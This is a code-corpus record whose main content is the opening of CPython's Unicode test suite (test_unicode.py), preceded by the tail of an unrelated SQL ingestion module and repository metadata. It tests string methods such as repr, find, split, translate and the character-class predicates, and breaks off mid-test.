wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def get_report(self):
return self.report
def close(self):
pass
| true
| true
|
f70504c11afdc0157e75d2a01ec110e01f694f06
| 132,215
|
py
|
Python
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 7
|
2018-04-12T17:11:04.000Z
|
2021-12-02T14:01:47.000Z
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 1
|
2021-12-01T08:11:51.000Z
|
2021-12-01T08:11:51.000Z
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 4
|
2018-04-27T18:03:08.000Z
|
2020-04-12T23:14:29.000Z
|
""" Test script for the Unicode implementation.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import _string
import codecs
import itertools
import operator
import struct
import string
import sys
import unittest
import warnings
from test import support, string_tests
# Error handling (bad decoder return)
def search_function(encoding):
def decode1(input, errors="strict"):
return 42 # not a tuple
def encode1(input, errors="strict"):
return 42 # not a tuple
def encode2(input, errors="strict"):
return (42, 42) # no unicode
def decode2(input, errors="strict"):
return (42, 42) # no unicode
if encoding=="test.unicode1":
return (encode1, decode1, None, None)
elif encoding=="test.unicode2":
return (encode2, decode2, None, None)
else:
return None
codecs.register(search_function)
def duplicate_string(text):
"""
Try to get a fresh clone of the specified text:
new object with a reference count of 1.
This is a best-effort: latin1 single letters and the empty
string ('') are singletons and cannot be cloned.
"""
return text.encode().decode()
class StrSubclass(str):
pass
class UnicodeTest(string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
unittest.TestCase):
type2test = str
def checkequalnofix(self, result, object, methodname, *args):
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(type(realresult) is type(result))
# if the original is returned make sure that
# this doesn't happen with subclasses
if realresult is object:
class usub(str):
def __repr__(self):
return 'usub(%r)' % str.__repr__(self)
object = usub(object)
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(object is not realresult)
def test_literals(self):
self.assertEqual('\xff', '\u00ff')
self.assertEqual('\uffff', '\U0000ffff')
self.assertRaises(SyntaxError, eval, '\'\\Ufffffffe\'')
self.assertRaises(SyntaxError, eval, '\'\\Uffffffff\'')
self.assertRaises(SyntaxError, eval, '\'\\U%08x\'' % 0x110000)
# raw strings should not have unicode escapes
self.assertNotEqual(r"\u0020", " ")
def test_ascii(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(ascii('abc'), "'abc'")
self.assertEqual(ascii('ab\\c'), "'ab\\\\c'")
self.assertEqual(ascii('ab\\'), "'ab\\\\'")
self.assertEqual(ascii('\\c'), "'\\\\c'")
self.assertEqual(ascii('\\'), "'\\\\'")
self.assertEqual(ascii('\n'), "'\\n'")
self.assertEqual(ascii('\r'), "'\\r'")
self.assertEqual(ascii('\t'), "'\\t'")
self.assertEqual(ascii('\b'), "'\\x08'")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'"), '''"'"''')
self.assertEqual(ascii('"'), """'"'""")
latin1repr = (
"'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
"\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
"\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
"\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
"\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
"\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
"\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
"\\xfe\\xff'")
testrepr = ascii(''.join(map(chr, range(256))))
self.assertEqual(testrepr, latin1repr)
# Test ascii works on wide unicode escapes without overflow.
self.assertEqual(ascii("\U00010000" * 39 + "\uffff" * 4096),
ascii("\U00010000" * 39 + "\uffff" * 4096))
class WrongRepr:
def __repr__(self):
return b'byte-repr'
self.assertRaises(TypeError, ascii, WrongRepr())
def test_repr(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(repr('abc'), "'abc'")
self.assertEqual(repr('ab\\c'), "'ab\\\\c'")
self.assertEqual(repr('ab\\'), "'ab\\\\'")
self.assertEqual(repr('\\c'), "'\\\\c'")
self.assertEqual(repr('\\'), "'\\\\'")
self.assertEqual(repr('\n'), "'\\n'")
self.assertEqual(repr('\r'), "'\\r'")
self.assertEqual(repr('\t'), "'\\t'")
self.assertEqual(repr('\b'), "'\\x08'")
self.assertEqual(repr("'\""), """'\\'"'""")
self.assertEqual(repr("'\""), """'\\'"'""")
self.assertEqual(repr("'"), '''"'"''')
self.assertEqual(repr('"'), """'"'""")
latin1repr = (
"'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9"
"\xaa\xab\xac\\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3"
"\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd"
"\xfe\xff'")
testrepr = repr(''.join(map(chr, range(256))))
self.assertEqual(testrepr, latin1repr)
# Test repr works on wide unicode escapes without overflow.
self.assertEqual(repr("\U00010000" * 39 + "\uffff" * 4096),
repr("\U00010000" * 39 + "\uffff" * 4096))
class WrongRepr:
def __repr__(self):
return b'byte-repr'
self.assertRaises(TypeError, repr, WrongRepr())
def test_iterators(self):
# Make sure unicode objects have an __iter__ method
it = "\u1111\u2222\u3333".__iter__()
self.assertEqual(next(it), "\u1111")
self.assertEqual(next(it), "\u2222")
self.assertEqual(next(it), "\u3333")
self.assertRaises(StopIteration, next, it)
def test_count(self):
string_tests.CommonTest.test_count(self)
# check mixed argument types
self.checkequalnofix(3, 'aaa', 'count', 'a')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(3, 'aaa', 'count', 'a')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(1, 'aaa', 'count', 'a', -1)
self.checkequalnofix(3, 'aaa', 'count', 'a', -10)
self.checkequalnofix(2, 'aaa', 'count', 'a', 0, -1)
self.checkequalnofix(0, 'aaa', 'count', 'a', 0, -10)
# test mixed kinds
self.checkequal(10, '\u0102' + 'a' * 10, 'count', 'a')
self.checkequal(10, '\U00100304' + 'a' * 10, 'count', 'a')
self.checkequal(10, '\U00100304' + '\u0102' * 10, 'count', '\u0102')
self.checkequal(0, 'a' * 10, 'count', '\u0102')
self.checkequal(0, 'a' * 10, 'count', '\U00100304')
self.checkequal(0, '\u0102' * 10, 'count', '\U00100304')
self.checkequal(10, '\u0102' + 'a_' * 10, 'count', 'a_')
self.checkequal(10, '\U00100304' + 'a_' * 10, 'count', 'a_')
self.checkequal(10, '\U00100304' + '\u0102_' * 10, 'count', '\u0102_')
self.checkequal(0, 'a' * 10, 'count', 'a\u0102')
self.checkequal(0, 'a' * 10, 'count', 'a\U00100304')
self.checkequal(0, '\u0102' * 10, 'count', '\u0102\U00100304')
def test_find(self):
string_tests.CommonTest.test_find(self)
# test implementation details of the memchr fast path
self.checkequal(100, 'a' * 100 + '\u0102', 'find', '\u0102')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0201')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0120')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0220')
self.checkequal(100, 'a' * 100 + '\U00100304', 'find', '\U00100304')
self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00100204')
self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00102004')
# check mixed argument types
self.checkequalnofix(0, 'abcdefghiabc', 'find', 'abc')
self.checkequalnofix(9, 'abcdefghiabc', 'find', 'abc', 1)
self.checkequalnofix(-1, 'abcdefghiabc', 'find', 'def', 4)
self.assertRaises(TypeError, 'hello'.find)
self.assertRaises(TypeError, 'hello'.find, 42)
# test mixed kinds
self.checkequal(100, '\u0102' * 100 + 'a', 'find', 'a')
self.checkequal(100, '\U00100304' * 100 + 'a', 'find', 'a')
self.checkequal(100, '\U00100304' * 100 + '\u0102', 'find', '\u0102')
self.checkequal(-1, 'a' * 100, 'find', '\u0102')
self.checkequal(-1, 'a' * 100, 'find', '\U00100304')
self.checkequal(-1, '\u0102' * 100, 'find', '\U00100304')
self.checkequal(100, '\u0102' * 100 + 'a_', 'find', 'a_')
self.checkequal(100, '\U00100304' * 100 + 'a_', 'find', 'a_')
self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'find', '\u0102_')
self.checkequal(-1, 'a' * 100, 'find', 'a\u0102')
self.checkequal(-1, 'a' * 100, 'find', 'a\U00100304')
self.checkequal(-1, '\u0102' * 100, 'find', '\u0102\U00100304')
def test_rfind(self):
string_tests.CommonTest.test_rfind(self)
# test implementation details of the memrchr fast path
self.checkequal(0, '\u0102' + 'a' * 100 , 'rfind', '\u0102')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0201')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0120')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0220')
self.checkequal(0, '\U00100304' + 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00100204')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00102004')
# check mixed argument types
self.checkequalnofix(9, 'abcdefghiabc', 'rfind', 'abc')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
# test mixed kinds
self.checkequal(0, 'a' + '\u0102' * 100, 'rfind', 'a')
self.checkequal(0, 'a' + '\U00100304' * 100, 'rfind', 'a')
self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304')
self.checkequal(0, '_a' + '\u0102' * 100, 'rfind', '_a')
self.checkequal(0, '_a' + '\U00100304' * 100, 'rfind', '_a')
self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rfind', '_\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102a')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304a')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304\u0102')
def test_index(self):
string_tests.CommonTest.test_index(self)
self.checkequalnofix(0, 'abcdefghiabc', 'index', '')
self.checkequalnofix(3, 'abcdefghiabc', 'index', 'def')
self.checkequalnofix(0, 'abcdefghiabc', 'index', 'abc')
self.checkequalnofix(9, 'abcdefghiabc', 'index', 'abc', 1)
self.assertRaises(ValueError, 'abcdefghiabc'.index, 'hib')
self.assertRaises(ValueError, 'abcdefghiab'.index, 'abc', 1)
self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', 8)
self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', -1)
# test mixed kinds
self.checkequal(100, '\u0102' * 100 + 'a', 'index', 'a')
self.checkequal(100, '\U00100304' * 100 + 'a', 'index', 'a')
self.checkequal(100, '\U00100304' * 100 + '\u0102', 'index', '\u0102')
self.assertRaises(ValueError, ('a' * 100).index, '\u0102')
self.assertRaises(ValueError, ('a' * 100).index, '\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).index, '\U00100304')
self.checkequal(100, '\u0102' * 100 + 'a_', 'index', 'a_')
self.checkequal(100, '\U00100304' * 100 + 'a_', 'index', 'a_')
self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'index', '\u0102_')
self.assertRaises(ValueError, ('a' * 100).index, 'a\u0102')
self.assertRaises(ValueError, ('a' * 100).index, 'a\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).index, '\u0102\U00100304')
def test_rindex(self):
string_tests.CommonTest.test_rindex(self)
self.checkequalnofix(12, 'abcdefghiabc', 'rindex', '')
self.checkequalnofix(3, 'abcdefghiabc', 'rindex', 'def')
self.checkequalnofix(9, 'abcdefghiabc', 'rindex', 'abc')
self.checkequalnofix(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
self.assertRaises(ValueError, 'abcdefghiabc'.rindex, 'hib')
self.assertRaises(ValueError, 'defghiabc'.rindex, 'def', 1)
self.assertRaises(ValueError, 'defghiabc'.rindex, 'abc', 0, -1)
self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, 8)
self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, -1)
# test mixed kinds
self.checkequal(0, 'a' + '\u0102' * 100, 'rindex', 'a')
self.checkequal(0, 'a' + '\U00100304' * 100, 'rindex', 'a')
self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rindex', '\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304')
self.checkequal(0, '_a' + '\u0102' * 100, 'rindex', '_a')
self.checkequal(0, '_a' + '\U00100304' * 100, 'rindex', '_a')
self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rindex', '_\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102a')
self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304a')
self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304\u0102')
def test_maketrans_translate(self):
# these work with plain translate()
self.checkequalnofix('bbbc', 'abababc', 'translate',
{ord('a'): None})
self.checkequalnofix('iiic', 'abababc', 'translate',
{ord('a'): None, ord('b'): ord('i')})
self.checkequalnofix('iiix', 'abababc', 'translate',
{ord('a'): None, ord('b'): ord('i'), ord('c'): 'x'})
self.checkequalnofix('c', 'abababc', 'translate',
{ord('a'): None, ord('b'): ''})
self.checkequalnofix('xyyx', 'xzx', 'translate',
{ord('z'): 'yy'})
# this needs maketrans()
self.checkequalnofix('abababc', 'abababc', 'translate',
{'b': '<i>'})
tbl = self.type2test.maketrans({'a': None, 'b': '<i>'})
self.checkequalnofix('<i><i><i>c', 'abababc', 'translate', tbl)
# test alternative way of calling maketrans()
tbl = self.type2test.maketrans('abc', 'xyz', 'd')
self.checkequalnofix('xyzzy', 'abdcdcbdddd', 'translate', tbl)
# various tests switching from ASCII to latin1 or the opposite;
# same length, remove a letter, or replace with a longer string.
self.assertEqual("[a]".translate(str.maketrans('a', 'X')),
"[X]")
self.assertEqual("[a]".translate(str.maketrans({'a': 'X'})),
"[X]")
self.assertEqual("[a]".translate(str.maketrans({'a': None})),
"[]")
self.assertEqual("[a]".translate(str.maketrans({'a': 'XXX'})),
"[XXX]")
self.assertEqual("[a]".translate(str.maketrans({'a': '\xe9'})),
"[\xe9]")
self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '123'})),
"x123")
self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '\xe9'})),
"x\xe9")
# test non-ASCII (don't take the fast-path)
self.assertEqual("[a]".translate(str.maketrans({'a': '<\xe9>'})),
"[<\xe9>]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': 'a'})),
"[a]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': None})),
"[]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': '123'})),
"[123]")
self.assertEqual("[a\xe9]".translate(str.maketrans({'a': '<\u20ac>'})),
"[<\u20ac>\xe9]")
# invalid Unicode characters
invalid_char = 0x10ffff+1
for before in "a\xe9\u20ac\U0010ffff":
mapping = str.maketrans({before: invalid_char})
text = "[%s]" % before
self.assertRaises(ValueError, text.translate, mapping)
# errors
self.assertRaises(TypeError, self.type2test.maketrans)
self.assertRaises(ValueError, self.type2test.maketrans, 'abc', 'defg')
self.assertRaises(TypeError, self.type2test.maketrans, 2, 'def')
self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 2)
self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 'def', 2)
self.assertRaises(ValueError, self.type2test.maketrans, {'xy': 2})
self.assertRaises(TypeError, self.type2test.maketrans, {(1,): 2})
self.assertRaises(TypeError, 'hello'.translate)
self.assertRaises(TypeError, 'abababc'.translate, 'abc', 'xyz')
def test_split(self):
string_tests.CommonTest.test_split(self)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'split', delim)
self.checkequal([left, right],
left + delim + right, 'split', delim)
self.checkequal([left + right],
left + right, 'split', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'split', delim *2)
def test_rsplit(self):
string_tests.CommonTest.test_rsplit(self)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'rsplit', delim)
self.checkequal([left, right],
left + delim + right, 'rsplit', delim)
self.checkequal([left + right],
left + right, 'rsplit', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'rsplit', delim *2)
def test_partition(self):
string_tests.MixinStrUnicodeUserStringTest.test_partition(self)
# test mixed kinds
self.checkequal(('ABCDEFGH', '', ''), 'ABCDEFGH', 'partition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal((left + right, '', ''),
left + right, 'partition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'partition', delim)
self.checkequal((left + right, '', ''),
left + right, 'partition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'partition', delim * 2)
def test_rpartition(self):
string_tests.MixinStrUnicodeUserStringTest.test_rpartition(self)
# test mixed kinds
self.checkequal(('', '', 'ABCDEFGH'), 'ABCDEFGH', 'rpartition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'rpartition', delim)
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'rpartition', delim * 2)
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
class MyWrapper:
def __init__(self, sval): self.sval = sval
def __str__(self): return self.sval
# mixed arguments
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkraises(TypeError, ' ', 'join', ['1', '2', MyWrapper('foo')])
self.checkraises(TypeError, ' ', 'join', ['1', '2', '3', bytes()])
self.checkraises(TypeError, ' ', 'join', [1, 2, 3])
self.checkraises(TypeError, ' ', 'join', ['1', '2', 3])
@unittest.skipIf(sys.maxsize > 2**32,
'needs too much memory on a 64-bit platform')
def test_join_overflow(self):
size = int(sys.maxsize**0.5) + 1
seq = ('A' * size,) * size
self.assertRaises(OverflowError, ''.join, seq)
def test_replace(self):
string_tests.CommonTest.test_replace(self)
# method call forwarded from str implementation because of unicode argument
self.checkequalnofix('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.assertRaises(TypeError, 'replace'.replace, "r", 42)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
for repl in ('d', '\u0103', '\U00010303'):
self.checkequal(left + right,
left + right, 'replace', delim, repl)
self.checkequal(left + repl + right,
left + delim + right,
'replace', delim, repl)
self.checkequal(left + right,
left + right, 'replace', delim * 2, repl)
self.checkequal(left + repl + right,
left + delim * 2 + right,
'replace', delim * 2, repl)
@support.cpython_only
def test_replace_id(self):
pattern = 'abc'
text = 'abc def'
self.assertIs(text.replace(pattern, pattern), text)
def test_bytes_comparison(self):
with support.check_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertEqual('abc' == b'abc', False)
self.assertEqual('abc' != b'abc', True)
self.assertEqual('abc' == bytearray(b'abc'), False)
self.assertEqual('abc' != bytearray(b'abc'), True)
def test_comparison(self):
# Comparisons:
self.assertEqual('abc', 'abc')
self.assertTrue('abcd' > 'abc')
self.assertTrue('abc' < 'abcd')
if 0:
# Move these tests to a Unicode collation module test...
# Testing UTF-16 code point order comparisons...
# No surrogates, no fixup required.
self.assertTrue('\u0061' < '\u20ac')
# Non surrogate below surrogate value, no fixup required
self.assertTrue('\u0061' < '\ud800\udc02')
# Non surrogate above surrogate value, fixup required
def test_lecmp(s, s2):
self.assertTrue(s < s2)
def test_fixup(s):
s2 = '\ud800\udc01'
test_lecmp(s, s2)
s2 = '\ud900\udc01'
test_lecmp(s, s2)
s2 = '\uda00\udc01'
test_lecmp(s, s2)
s2 = '\udb00\udc01'
test_lecmp(s, s2)
s2 = '\ud800\udd01'
test_lecmp(s, s2)
s2 = '\ud900\udd01'
test_lecmp(s, s2)
s2 = '\uda00\udd01'
test_lecmp(s, s2)
s2 = '\udb00\udd01'
test_lecmp(s, s2)
s2 = '\ud800\ude01'
test_lecmp(s, s2)
s2 = '\ud900\ude01'
test_lecmp(s, s2)
s2 = '\uda00\ude01'
test_lecmp(s, s2)
s2 = '\udb00\ude01'
test_lecmp(s, s2)
s2 = '\ud800\udfff'
test_lecmp(s, s2)
s2 = '\ud900\udfff'
test_lecmp(s, s2)
s2 = '\uda00\udfff'
test_lecmp(s, s2)
s2 = '\udb00\udfff'
test_lecmp(s, s2)
test_fixup('\ue000')
test_fixup('\uff61')
# Surrogates on both sides, no fixup required
self.assertTrue('\ud800\udc02' < '\ud84d\udc56')
def test_islower(self):
super().test_islower()
self.checkequalnofix(False, '\u1FFc', 'islower')
self.assertFalse('\u2167'.islower())
self.assertTrue('\u2177'.islower())
# non-BMP, uppercase
self.assertFalse('\U00010401'.islower())
self.assertFalse('\U00010427'.islower())
# non-BMP, lowercase
self.assertTrue('\U00010429'.islower())
self.assertTrue('\U0001044E'.islower())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.islower())
self.assertFalse('\U0001F46F'.islower())
def test_isupper(self):
super().test_isupper()
if not sys.platform.startswith('java'):
self.checkequalnofix(False, '\u1FFc', 'isupper')
self.assertTrue('\u2167'.isupper())
self.assertFalse('\u2177'.isupper())
# non-BMP, uppercase
self.assertTrue('\U00010401'.isupper())
self.assertTrue('\U00010427'.isupper())
# non-BMP, lowercase
self.assertFalse('\U00010429'.isupper())
self.assertFalse('\U0001044E'.isupper())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.isupper())
self.assertFalse('\U0001F46F'.isupper())
def test_istitle(self):
super().test_istitle()
self.checkequalnofix(True, '\u1FFc', 'istitle')
self.checkequalnofix(True, 'Greek \u1FFcitlecases ...', 'istitle')
# non-BMP, uppercase + lowercase
self.assertTrue('\U00010401\U00010429'.istitle())
self.assertTrue('\U00010427\U0001044E'.istitle())
# apparently there are no titlecased (Lt) non-BMP chars in Unicode 6
for ch in ['\U00010429', '\U0001044E', '\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.istitle(), '{!a} is not title'.format(ch))
def test_isspace(self):
super().test_isspace()
self.checkequalnofix(True, '\u2000', 'isspace')
self.checkequalnofix(True, '\u200a', 'isspace')
self.checkequalnofix(False, '\u2014', 'isspace')
# apparently there are no non-BMP spaces chars in Unicode 6
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isspace(), '{!a} is not space.'.format(ch))
def test_isalnum(self):
super().test_isalnum()
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isalnum(), '{!a} is alnum.'.format(ch))
def test_isalpha(self):
super().test_isalpha()
self.checkequalnofix(True, '\u1FFc', 'isalpha')
# non-BMP, cased
self.assertTrue('\U00010401'.isalpha())
self.assertTrue('\U00010427'.isalpha())
self.assertTrue('\U00010429'.isalpha())
self.assertTrue('\U0001044E'.isalpha())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.isalpha())
self.assertFalse('\U0001F46F'.isalpha())
def test_isdecimal(self):
self.checkequalnofix(False, '', 'isdecimal')
self.checkequalnofix(False, 'a', 'isdecimal')
self.checkequalnofix(True, '0', 'isdecimal')
self.checkequalnofix(False, '\u2460', 'isdecimal') # CIRCLED DIGIT ONE
self.checkequalnofix(False, '\xbc', 'isdecimal') # VULGAR FRACTION ONE QUARTER
self.checkequalnofix(True, '\u0660', 'isdecimal') # ARABIC-INDIC DIGIT ZERO
self.checkequalnofix(True, '0123456789', 'isdecimal')
self.checkequalnofix(False, '0123456789a', 'isdecimal')
self.checkraises(TypeError, 'abc', 'isdecimal', 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065', '\U0001F107']:
self.assertFalse(ch.isdecimal(), '{!a} is not decimal.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0']:
self.assertTrue(ch.isdecimal(), '{!a} is decimal.'.format(ch))
def test_isdigit(self):
super().test_isdigit()
self.checkequalnofix(True, '\u2460', 'isdigit')
self.checkequalnofix(False, '\xbc', 'isdigit')
self.checkequalnofix(True, '\u0660', 'isdigit')
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065']:
self.assertFalse(ch.isdigit(), '{!a} is not a digit.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isdigit(), '{!a} is a digit.'.format(ch))
def test_isnumeric(self):
self.checkequalnofix(False, '', 'isnumeric')
self.checkequalnofix(False, 'a', 'isnumeric')
self.checkequalnofix(True, '0', 'isnumeric')
self.checkequalnofix(True, '\u2460', 'isnumeric')
self.checkequalnofix(True, '\xbc', 'isnumeric')
self.checkequalnofix(True, '\u0660', 'isnumeric')
self.checkequalnofix(True, '0123456789', 'isnumeric')
self.checkequalnofix(False, '0123456789a', 'isnumeric')
self.assertRaises(TypeError, "abc".isnumeric, 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
